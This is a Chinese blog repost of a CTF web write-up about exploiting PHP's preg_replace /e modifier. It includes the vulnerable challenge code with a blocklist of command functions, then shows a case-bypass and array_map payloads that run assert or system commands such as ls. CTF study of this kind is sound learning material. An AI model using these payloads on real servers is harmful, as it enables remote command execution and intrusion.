ctf---rce

最新推荐文章于 2024-08-09 18:10:49 发布
最新推荐文章于 2024-08-09 18:10:49 发布
阅读量430 收藏 6
点赞数 3
分类专栏: CTF web类 文章标签: web安全 网络安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51520483/article/details/138927362
版权 
<?php
if($_GET['moran'] === 'flag'){
    highlight_file(__FILE__);
    if(isset($_POST['task'])&&isset($_POST['flag'])){
        $str1 = $_POST['task'];
        $str2 = $_POST['flag'];
        if(preg_match('/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i',$str1) || strlen($str2) != 19 || preg_match('/please_give_me_flag/',$str2)){
            die('hacker!');
        }else{
            preg_replace("/please_give_me_flag/ei",$_POST['task'],$_POST['flag']);
        }
    }
}else{
    echo "moran want a flag.</br>(?moran=flag)";



1、分析源码

需要利用的函数是preg_replace(),使用了/e修饰符,当第一个参数的字符串在第三个参数中检测到时,会将第二个参数作为php代码执行,且使用了/i的修饰符,大小写不敏感

2、需要绕过正则匹配


①能直接用的命令执行函数基本上都被过滤了,限制了flag字符串长度,并且过滤了preg_replace()中的please_give_me_flag,但是没有使用/i大小写不敏感,所以可以用大写绕过 task参数传入的为我们需要执行的代码,

②flag参数传入含有please_give_me_flag的字符串 查阅可以进行RCE的函数,发现还有一个array_map()可以使用 array_map()需传入两个参数,第一个参数为使用的函数,第二个参数为一个数组,并且数组的数据为函数的参数,例如

&arr = array('phpinfo()');
array_map('assert',&arr);


就可以执行phpinfo()

由于task参数被限制,可以添加$_POST['a']来执行任意代码


payload:task=array_map($_POST['a'],$_POST['b'])&flag=please_give_me_flaG&a=assert&b[]=phpinfo()

执行成功,开始找flag,用system(

task=array_map($_POST['a'],$_POST['b'])&flag=please_give_me_flaG&a=system&b[]=ls

task=array_map($_POST['a'],$_POST['b'])&flag=please_give_me_flaG&a=system&b[]=ls /

最后查看flag

本篇文章为转载内容,跟着原作者步骤复盘,在这感谢moran师傅



# 原作者作者(Author):moran
# 链接(URL):https://blog.moran233.xyz/index.php/2024/05/14/83/moran/
# 来源(Source):moranのblog
 

你挡我发光了
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB攻防-PHP特性-学以致用
luffysec的博客
01-11 4510
学习笔记-WEB攻防-PHP特性-学以致用
PHP代码审计入门1
lwwzyy
09-03 342
CTF中的PHP代码审计
Web】H&NCTF 2024 题解(部分)
uuzeray的博客
05-14 1261
先切回ctfer,sudo adduser kobe创建一个kobe用户。题目是对java文件进行编译操作,就是系统命令执行javac拼接文件名。./main.go是403访问./main-old.zip下载附件。是一个方便的命令行工具,用于在 Linux 系统中管理用户账户。查看/var/mail/ctfgame,读邮件中的敏感信息。没权限看/etc/sudoers ,用sudo -l。命令的特权,而且无需输入密码,但被限制不能以。看到kobe,可以apt-get提权。结合源码,能看出考的是sql注入。
CTF-RCE
m0_74214882的博客
08-05 407
base64 falg.php".这个与127.0.0.1| cat falg.php | base64是等价的。发现了flag.php因为过滤了/\不能使用ls/查看子目录使用cd。因为分割符为%0a所以要在url里输入,因为在框内会二次编码。查了一下,在linux下,命令分隔符除了;试试127.0.0.1发现过滤了cat。输入127.0.0.1看看发现过滤空格。看到过滤运算符我们这边用;过滤了管道符|,不能再使用了。发现过滤了一堆我们可以用的。flag可以用正则f***这边我选择/**/替代。
web-ctfctf-pikachu-RCE
一个努力生活的人的博客
07-11 784
pikachu-RCE
CTFhub-RCE-远程包含
ssss39的博客
11-14 197
给咱一个phpinfo那么必然有他的道理PHP的配置选项allow_url_include为ON的话,则include/require函数可以加载远程文件,这种漏洞被称为"远程文件包含漏洞(Remote File Inclusion RFI)"。allow_url_fopen = On 是否允许打开远程文件allow_url_include = On 是否允许include/require远程文件。
CTFHUB-web-RCE
ookami6497的博客
12-03 1442
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 579
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2082
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
My-CTF-Challenges
05-16
在Java中,如果反序列化的类没有正确实现`readObject()`方法或者不安全的对象被反序列化,攻击者可以通过构造恶意的序列化数据来执行任意代码,从而导致远程代码执行(RCE)或权限提升等安全问题。 对于这个挑战,...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 对已提供Dockerfile...
CTF-Writeups
05-16
CTF编写 该存储库是我为已解决的每个房间/机器编写的所有文章的集合。 文章和平台 Tryhackme 房间名称 难度级别 专注技能 :United_States: 难的 SSH隧道,SQL RCE,PATH变量Privesc Vulnhub 房间名称 难度级别 ...
CTF-WEB入门DOC-2019版1
08-03
CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
my-ctf-challenges:我创建的CTF挑战
05-28
★★★☆ Python导入RCE,gunicorn前叉工作者模型,正则表达式DoS网页★★★☆☆ Windows命令注入,Python库,0天网页★★★★★ JavaScript,WebRTC STUN,协议走私,不安全的端口限制绕过AIS3 EOF CTF 国产周转...
科普课堂走起 | 什么是网络安全和数据安全?
最新发布
anqishenrjjian的博客
08-09 195
数据安全是指保护数据免遭意外或非法访问、更改、泄露或破坏的一系列策略和技术。它的目标是在整个数据生命周期中保护数据资产的价值和完整性。网络安全是指保护网络系统免受未经授权的访问、攻击、破坏或滥用的一系列技术和过程。网络安全更侧重于保护网络基础设施本身,而数据安全则侧重于保护存储在网络中的数据。希望这些信息对你有所帮助!在实际应用中,这两者往往是相辅相成的,共同构成了一个组织全面的安全框架。防火墙:监控并控制进出网络的流量,根据预定的安全规则过滤数据包。数据加密:将数据转换为只有授权用户才能解码的形式。
网络安全】玲珑安全第四期
等风来
08-08 251
鉴于玲珑安全漏洞挖掘前三期课程取得的优异成绩和获得的强烈反响,我们决定启动玲珑安全第四期漏洞挖掘培训计划。
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
m0_57291352的博客
08-09 1149
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
ctfhub rce
09-01
你想了解关于 CTFHub 的 RCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值